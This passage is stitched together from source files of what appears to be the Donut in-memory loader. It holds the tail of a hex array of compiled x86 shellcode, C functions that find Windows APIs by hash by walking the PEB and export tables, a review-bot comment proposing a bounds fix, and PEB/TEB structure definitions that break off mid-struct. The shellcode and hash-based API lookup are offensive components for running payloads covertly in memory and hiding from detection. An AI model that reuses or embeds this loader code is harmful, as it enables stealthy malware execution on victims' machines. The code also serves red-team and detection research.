554 0xd8, 0x85, 0xdb, 0x0f, 0x84, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x8f, 0x10,
555 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x53, 0x6a, 0xff, 0x8d, 0x8f, 0x18,
556 0x19, 0x00, 0x00, 0x51, 0x55, 0x55, 0xff, 0x56, 0x50, 0x55, 0x55, 0xff,
557 0x96, 0xa8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x87, 0x00, 0x00,
558 0x00, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x86, 0xec, 0x04, 0x00, 0x00,
559 0x50, 0x6a, 0x01, 0x55, 0x8d, 0x86, 0xdc, 0x04, 0x00, 0x00, 0x50, 0xff,
560 0x96, 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x61, 0x8b, 0x44, 0x24,
561 0x10, 0x8d, 0x54, 0x24, 0x20, 0x52, 0x53, 0x50, 0x8b, 0x08, 0xff, 0x91,
562 0x04, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x40, 0x66, 0x39, 0x6c, 0x24,
563 0x20, 0x74, 0x39, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50,
564 0x8d, 0x86, 0xfc, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12,
565 0x85, 0xc0, 0x75, 0x20, 0x8b, 0x44, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18,
566 0x52, 0xff, 0x74, 0x24, 0x18, 0x8b, 0x08, 0x50, 0xff, 0x91, 0x8c, 0x00,
567 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08,
568 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0xff, 0x96,
569 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x40, 0x07, 0x00, 0x00, 0x8d, 0x04,
570 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0x53, 0xe8, 0xf8, 0x02, 0x00,
571 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x55, 0x53, 0xff,
572 0x56, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x0c, 0xc3, 0x8b, 0x44,
573 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10,
574 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44,
575 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24, 0x08, 0xc3, 0xe8, 0x00, 0x00, 0x00,
576 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x30,
577 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c,
578 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14,
579 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x8c,
580 0xed, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46,
581 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x8b, 0x44,
582 0x24, 0x08, 0x56, 0x8b, 0x74, 0x24, 0x08, 0x8a, 0x16, 0x84, 0xd2, 0x74,
583 0x14, 0x8a, 0xca, 0x2b, 0xf0, 0x8a, 0xd1, 0x3a, 0x08, 0x75, 0x0a, 0x40,
584 0x8a, 0x0c, 0x06, 0x8a, 0xd1, 0x84, 0xc9, 0x75, 0xf0, 0x0f, 0xb6, 0x08,
585 0x0f, 0xb6, 0xc2, 0x2b, 0xc1, 0x5e, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b,
586 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24, 0x28, 0x56, 0x57,
587 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89, 0x74, 0x24, 0x10,
588 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9, 0x74, 0x11, 0x83,
589 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47, 0x40, 0x89, 0x44,
590 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7, 0x8d, 0x74, 0x24,
591 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xfd, 0x01, 0x00, 0x00,
592 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x21, 0x55,
593 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00, 0x00, 0x00, 0x6a,
594 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24, 0x6a, 0x00, 0x50,
595 0xe8, 0xd4, 0x01, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b, 0x44, 0x24, 0x2c,
596 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a, 0x10, 0x89, 0x44,
597 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff, 0x10, 0x75, 0x15,
598 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21, 0x00, 0x00, 0x00,
599 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff, 0x8b, 0x44, 0x24,
600 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x8b,
601 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x10,
602 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53, 0x55, 0x56, 0x8b,
603 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24, 0x10, 0xa5, 0xa5,
604 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24, 0x1c, 0x8b, 0x6c,
605 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24, 0x28, 0x8b, 0xce,
606 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2, 0xc1, 0xce, 0x08,
607 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3, 0xc1, 0xc7, 0x03,
608 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b, 0xe9, 0x43, 0x83,
609 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x10, 0xc3,
610 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x24,
611 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x20,
612 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b, 0xe8, 0x57, 0x89,
613 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0, 0x8d, 0x7c, 0x24,
614 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x28, 0x8b,
615 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf3,
616 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b, 0x7c, 0x24, 0x18,
617 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10, 0x00, 0x00, 0x00,
618 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9, 0xc1, 0xc6, 0x08,
619 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce, 0xc1, 0xc7, 0x07,
620 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0, 0x10, 0x83, 0x6c,
621 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28, 0x89, 0x4c, 0x24,
622 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c, 0x24, 0x18, 0x89,
623 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44, 0x8c, 0x14, 0x41,
624 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34, 0x8b, 0xca, 0x6a,
625 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9, 0x7e, 0x19, 0x8d,
626 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9, 0x8a, 0x04, 0x37,
627 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b, 0x6c, 0x24, 0x34,
628 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80, 0x01, 0x01, 0x75,
629 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3, 0x8b, 0x44, 0x24,
630 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x5d,
631 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x8b, 0x44, 0x24,
632 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74, 0x13, 0x57, 0x8b, 0x7c, 0x24,
633 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88, 0x0e, 0x46, 0x83, 0xea, 0x01,
634 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44, 0x24, 0x08, 0x8b, 0x4c, 0x24,
635 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3, 0xaa, 0x8b, 0x44, 0x24, 0x08,
636 0x5f, 0xc3};
637
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // locate address of API in export table using Maru hash function
32 LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){
33 PIMAGE_DOS_HEADER dos;
34 PIMAGE_NT_HEADERS nt;
35 DWORD i, j, cnt, rva;
36 PIMAGE_DATA_DIRECTORY dir;
37 PIMAGE_EXPORT_DIRECTORY exp;
38 PDWORD adr;
39 PDWORD sym;
40 PWORD ord;
41 PCHAR api, dll, p;
42 LPVOID addr=NULL;
43 ULONG64 dll_hash;
44 CHAR buf[MAX_PATH], dll_name[64], api_name[128];
45
46 dos = (PIMAGE_DOS_HEADER)base;
47 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
48 dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
49 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
50
51 // if no export table, return NULL
52 if (rva==0) return NULL;
53
54 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
55 cnt = exp->NumberOfNames;
56
57 // if no api names, return NULL
58 if (cnt==0) return NULL;
59
60 adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
61 sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
62 ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
63 dll = RVA2VA(PCHAR, base, exp->Name);
64
65 // get hash of DLL string converted to lowercase
66 for(i=0;dll[i]!=0;i++) {
67 buf[i] = dll[i] | 0x20;
68 }
69 buf[i] = 0;
70 dll_hash = maru(buf, iv);
71
72 do {
73 // calculate hash of api string
74 api = RVA2VA(PCHAR, base, sym[cnt-1]);
75 // xor with DLL hash and compare with hash to find
76 if ((maru(api, iv) ^ dll_hash) == api_hash) {
77 // return address of function
78 addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
79
80 // is this a forward reference?
81 if ((PBYTE)addr >= (PBYTE)exp &&
82 (PBYTE)addr < (PBYTE)exp +
83 dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
84 {
85 DPRINT("%016llx is forwarded to %s",
86 api_hash, (char*)addr);
87
88 // copy DLL name to buffer
89 p=(char*)addr;
90
91 for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
92 dll_name[i] = p[i];
93 if(p[i] == '.') break;
94 }
95
96 dll_name[i+1] = 'd';
97 dll_name[i+2] = 'l';
98 dll_name[i+3] = 'l';
99 dll_name[i+4] = 0;
100
101 p += i + 1;
102
103 // copy API name to buffer
104 for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) {
105 api_name[i] = p[i];
106 }
107 api_name[i] = 0;
108
109 DPRINT("Trying to load %s", dll_name);
110 HMODULE hModule = inst->api.LoadLibrary(dll_name);
111
112 if(hModule != NULL) {
113 DPRINT("Calling GetProcAddress(%s)", api_name);
114 addr = inst->api.GetProcAddress(hModule, api_name);
115 } else addr = NULL;
116 }
117 return addr;
118 }
119 } while (--cnt && addr == NULL);
120
121 return addr;
122 }
123
124 // search all modules in the PEB for API
125 LPVOID xGetProcAddress(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) {
126 PPEB peb;
127 PPEB_LDR_DATA ldr;
128 PLDR_DATA_TABLE_ENTRY dte;
129 LPVOID addr = NULL;
130
131 #if defined(_WIN64)
132 peb = (PPEB) __readgsqword(0x60);
133 #else
134 peb = (PPEB) __readfsdword(0x30);
135 #endif
136
137 ldr = (PPEB_LDR_DATA)peb->Ldr;
138
139 // for each DLL loaded
140 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
141 dte->DllBase != NULL && addr == NULL;
142 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
143 {
144 // search the export table for api
145 addr = FindExport(inst, dte->DllBase, ulHash, ulIV);
146 }
147 return addr;
148 }
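Review bot: The forwarder name copy in FindExport, `for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++)`, can write one byte past `dll_name` and can leave `dll_name[i]` uninitialized: if the forwarder string has no '.' within the first 60 bytes the loop exits with i == 60 and `dll_name[i+4] = 0` stores to index 64 of a 64-byte array, while if it exits on the NUL instead `dll_name[i]` is never assigned and `p += i + 1` steps past the terminator before the api_name copy. Export-directory contents come from modules already mapped in the process rather than from remote input, so this is robustness rather than an exploitable hole, but the bound should be `sizeof(dll_name)-5` and a missing separator should abort the lookup instead of calling LoadLibrary on garbage. Separately, the `dte->DllBase != NULL` stop condition in xGetProcAddress is non-obvious: once the walk wraps to the list head inside PEB_LDR_DATA that read lands, I believe, on `EntryInProgress`, which is normally NULL; a one-line comment saying so would save the next reader the offset arithmetic.
```c
// copy DLL name to buffer (forwarder string is "DLLNAME.ApiName")
for(i=0; p[i] != 0 && p[i] != '.' && i < sizeof(dll_name)-5; i++) {
    dll_name[i] = p[i];
}
// no separator within the buffer: malformed or oversized forwarder, give up
if(p[i] != '.') return NULL;
dll_name[i]   = '.';
dll_name[i+1] = 'd';
dll_name[i+2] = 'l';
dll_name[i+3] = 'l';
dll_name[i+4] = 0;

p += i + 1;
/* … unchanged: api_name copy, LoadLibrary / GetProcAddress … */
```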
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PEB_H
32 #define PEB_H
33
34 #include <windows.h>
35
36 typedef void *PPS_POST_PROCESS_INIT_ROUTINE;
37
38 typedef struct _LSA_UNICODE_STRING {
39 USHORT Length;
40 USHORT MaximumLength;
41 PWSTR Buffer;
42 } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
43
44 typedef struct _RTL_USER_PROCESS_PARAMETERS {
45 BYTE Reserved1[16];
46 PVOID Reserved2[10];
47 UNICODE_STRING ImagePathName;
48 UNICODE_STRING CommandLine;
49 } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
50
51 // PEB defined by rewolf
52 // http://blog.rewolf.pl/blog/?p=573
53 typedef struct _PEB_LDR_DATA {
54 ULONG Length;
55 BOOL Initialized;
56 LPVOID SsHandle;
57 LIST_ENTRY InLoadOrderModuleList;
58 LIST_ENTRY InMemoryOrderModuleList;
59 LIST_ENTRY InInitializationOrderModuleList;
60 } PEB_LDR_DATA, *PPEB_LDR_DATA;
61
62 typedef struct _LDR_DATA_TABLE_ENTRY
63 {
64 LIST_ENTRY InLoadOrderLinks;
65 LIST_ENTRY InMemoryOrderLinks;
66 LIST_ENTRY InInitializationOrderLinks;
67 LPVOID DllBase;
68 LPVOID EntryPoint;
69 ULONG SizeOfImage;
70 UNICODE_STRING FullDllName;
71 UNICODE_STRING BaseDllName;
72 } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
73
74 typedef struct _PEB {
75 BYTE InheritedAddressSpace;
76 BYTE ReadImageFileExecOptions;
77 BYTE BeingDebugged;
78 BYTE _SYSTEM_DEPENDENT_01;
79
80 LPVOID Mutant;
81 LPVOID ImageBaseAddress;
82
83 PPEB_LDR_DATA Ldr;
84 PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
85 LPVOID SubSystemData;
86 LPVOID ProcessHeap;
87 LPVOID FastPebLock;
88 LPVOID _SYSTEM_DEPENDENT_02;
89 LPVOID _SYSTEM_DEPENDENT_03;
90 LPVOID _SYSTEM_DEPENDENT_04;
91 union {
92 LPVOID KernelCallbackTable;
93 LPVOID UserSharedInfoPtr;
94 };
95 DWORD SystemReserved;
96 DWORD _SYSTEM_DEPENDENT_05;
97 LPVOID _SYSTEM_DEPENDENT_06;
98 LPVOID TlsExpansionCounter;
99 LPVOID TlsBitmap;
100 DWORD TlsBitmapBits[2];
101 LPVOID ReadOnlySharedMemoryBase;
102 LPVOID _SYSTEM_DEPENDENT_07;
103 LPVOID ReadOnlyStaticServerData;
104 LPVOID AnsiCodePageData;
105 LPVOID OemCodePageData;
106 LPVOID UnicodeCaseTableData;
107 DWORD NumberOfProcessors;
108 union
109 {
110 DWORD NtGlobalFlag;
111 LPVOID dummy02;
112 };
113 LARGE_INTEGER CriticalSectionTimeout;
114 LPVOID HeapSegmentReserve;
115 LPVOID HeapSegmentCommit;
116 LPVOID HeapDeCommitTotalFreeThreshold;
117 LPVOID HeapDeCommitFreeBlockThreshold;
118 DWORD NumberOfHeaps;
119 DWORD MaximumNumberOfHeaps;
120 LPVOID ProcessHeaps;
121 LPVOID GdiSharedHandleTable;
122 LPVOID ProcessStarterHelper;
123 LPVOID GdiDCAttributeList;
124 LPVOID LoaderLock;
125 DWORD OSMajorVersion;
126 DWORD OSMinorVersion;
127 WORD OSBuildNumber;
128 WORD OSCSDVersion;
129 DWORD OSPlatformId;
130 DWORD ImageSubsystem;
131 DWORD ImageSubsystemMajorVersion;
132 LPVOID ImageSubsystemMinorVersion;
133 union
134 {
135 LPVOID ImageProcessAffinityMask;
136 LPVOID ActiveProcessAffinityMask;
137 };
138 #ifdef _WIN64
139 LPVOID GdiHandleBuffer[64];
140 #else
141 LPVOID GdiHandleBuffer[32];
142 #endif
143 LPVOID PostProcessInitRoutine;
144 LPVOID TlsExpansionBitmap;
145 DWORD TlsExpansionBitmapBits[32];
146 LPVOID SessionId;
147 ULARGE_INTEGER AppCompatFlags;
148 ULARGE_INTEGER AppCompatFlagsUser;
149 LPVOID pShimData;
150 LPVOID AppCompatInfo;
151 PUNICODE_STRING CSDVersion;
152 LPVOID ActivationContextData;
153 LPVOID ProcessAssemblyStorageMap;
154 LPVOID SystemDefaultActivationContextData;
155 LPVOID SystemAssemblyStorageMap;
156 LPVOID MinimumStackCommit;
157 } PEB, *PPEB;
158
159
160 typedef struct _CLIENT_ID {
161 HANDLE UniqueProcess;
162 HANDLE UniqueThread;
163 } CLIENT_ID, *PCLIENT_ID;
164
165 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
166 typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
167 typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME;
168 typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT;
169
170 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
171 PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous;
172 PACTIVATION_CONTEXT *ActivationContext;
173 ULONG Flags;
174 } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
175
176 typedef struct _ACTIVATION_CONTEXT_STACK
177 {
178 PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
179 LIST_ENTRY FrameListCache;
180 ULONG Flags;
181 ULONG NextCookieSequenceNumber;
182 ULONG StackId;
183 } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;
184 #define GDI_BATCH_BUFFER_SIZE 310
185
186 typedef struct _GDI_TEB_BATCH
187 {
188 ULONG Offset;
189 ULONG_PTR HDC;
190 ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
191 } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
192
193 typedef struct _TEB_ACTIVE_FRAME_CONTEXT
194 {
195 ULONG Flags;
196 PSTR FrameName;
197 } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
198
199 typedef struct _TEB_ACTIVE_FRAME
200 {
201 ULONG Flags;
202 struct _TEB_ACTIVE_FRAME *Previous;
203 PTEB_ACTIVE_FRAME_CONTEXT Context;
204 } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
205
206 #if !defined(_MSC_VER)
207 typedef struct _PROCESSOR_NUMBER {
208 USHORT Group;
209 UCHAR Number;
210 UCHAR Reserved;
211 } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
212 #endif
213
214 typedef struct _TEB
215 {
216 NT_TIB NtTib;
217
218 PVOID EnvironmentPointer;
219 CLIENT_ID ClientId;
220 PVOID ActiveRpcHandle;
221 PVOID ThreadLocalStoragePointer;
222 PPEB ProcessEnvironmentBlock;
223
224 ULONG LastErrorValue;
225 ULONG CountOfOwnedCriticalSections;
226 PVOID CsrClientThread;
227 PVOID Win32ThreadInfo;
228 ULONG User32Reserved[26];
229 ULONG UserReserved[5];
230 PVOID WOW32Reserved;
231 LCID CurrentLocale;
232 ULONG FpSoftwareStatusRegister;
233 PVOID SystemReserved1[54];
234 NTSTATUS ExceptionCode;
235 PVOID ActivationContextStackPointer;
236 #ifdef _M_X64
237 UCHAR SpareBytes[24];
238 #else
239 UCHAR SpareBytes[36];
240 #endif
241 ULONG TxFsContext;
242
243 GDI_TEB_BATCH GdiTebBatch;
244 CLIENT_ID RealClientId;
245 HANDLE GdiCachedProcessHandle;
246 ULONG GdiClientPID;
247 ULONG GdiClientTID;
248 PVOID GdiThreadLocalInfo;
249 ULONG_PTR Win32ClientInfo[62];
250 PVOID glDispatchTable[233];
251 ULONG_PTR glReserved1[29];
252 PVOID glReserved2;
253 PVOID glSectionInfo;
254 PVOID glSection;
255 PVOID glTable;
256 PVOID glCurrentRC;
257 PVOID glContext;
258
259 NTSTATUS LastStatusValue;
260 UNICODE_STRING StaticUnicodeString;
261 WCHAR StaticUnicodeBuffer[261];
262
263 PVOID DeallocationStack;
264 PVOID TlsSlots[64];
265 LIST_ENTRY TlsLinks;
266
267 PVOID Vdm;
268 PVOID ReservedForNtRpc;
269 PVOID DbgSsReserved[2];
270
271 ULONG HardErrorMode;
272 #ifdef _M_X64
273 PVOID Instrumentation[11];
274 #else
275 PVOID Instrumentation[9];
276 #endif
277 GUID ActivityId;
278
279 PVOID SubProcessTag;
280 PVOID EtwLocalData;
281 PVOID EtwTraceData;
282 PVOID WinSockData;
283 ULONG GdiBatchCount;
284
285 union
286 {
287 PROCESSOR_NUMBER CurrentIdealProcessor;
288 ULONG IdealProcessorValue;
289 struct
290 {
291 UCHAR ReservedPad0;
292 UCHAR ReservedPad1;
293 UCHAR ReservedPad2;
294 UCHAR IdealProcessor;
295 };
296 };
297
298 ULONG GuaranteedStackBytes;
299 PVOID ReservedForPerf;
300 PVOID ReservedForOle;
301 ULONG WaitingOnLoaderLock;
302 PVOID SavedPriorityState;
303 ULONG_PTR SoftPatchPtr1;
304 PVOID ThreadPoolData;
305 PVOID *TlsExpansionSlots;
306 #ifdef _M_X64
307 PVOID DeallocationBStore;
308 PVOID BStoreLimit;
309 #endif
310 ULONG MuiGeneration;
311 ULONG IsImpersonating;
312 PVOID NlsCache;
313 PVOID pShimData;
314 ULONG HeapVirtualAffinity;
315 HANDLE CurrentTransactionHandle;
316 PTEB_ACTIVE_FRAME ActiveFrame;
317 PVOID FlsData;
318
319 PVOID PreferredLanguages;
320 PVOID UserPrefLanguages;
321 PVOID MergedPrefLanguages;
322 ULONG MuiImpersonation;
323
324 union
325 {
326 USHORT CrossTebFlags;
327 USHORT SpareCrossTebBits : 16;
328 };
329 union
330 {
331 USHORT SameTebFlags;
332 struct
333 {
334 USHORT SafeThunkCall : 1;
335 USHORT InDebugPrint : 1;
336 USHORT HasFiberData : 1;
337 USHORT SkipThreadAttach : 1;
338 USHORT WerInShipAssertCode : 1;
339 USHORT RanProcessInit : 1;
340 USHORT ClonedThread : 1;
341 USHORT SuppressDebugMsg : 1;
342 USHORT DisableUserStackWalk : 1;
343 USHORT RtlExceptionAttached : 1;
344 USHORT InitialThread : 1;
345 USHORT SessionAware : 1;
346 USHORT SpareSameTebBits : 4;
347 };
348 };
349
350 PVOID TxnScopeEnterCallback;
351 PVOID TxnScopeExitCallback;
352 PVOID TxnScopeContext;
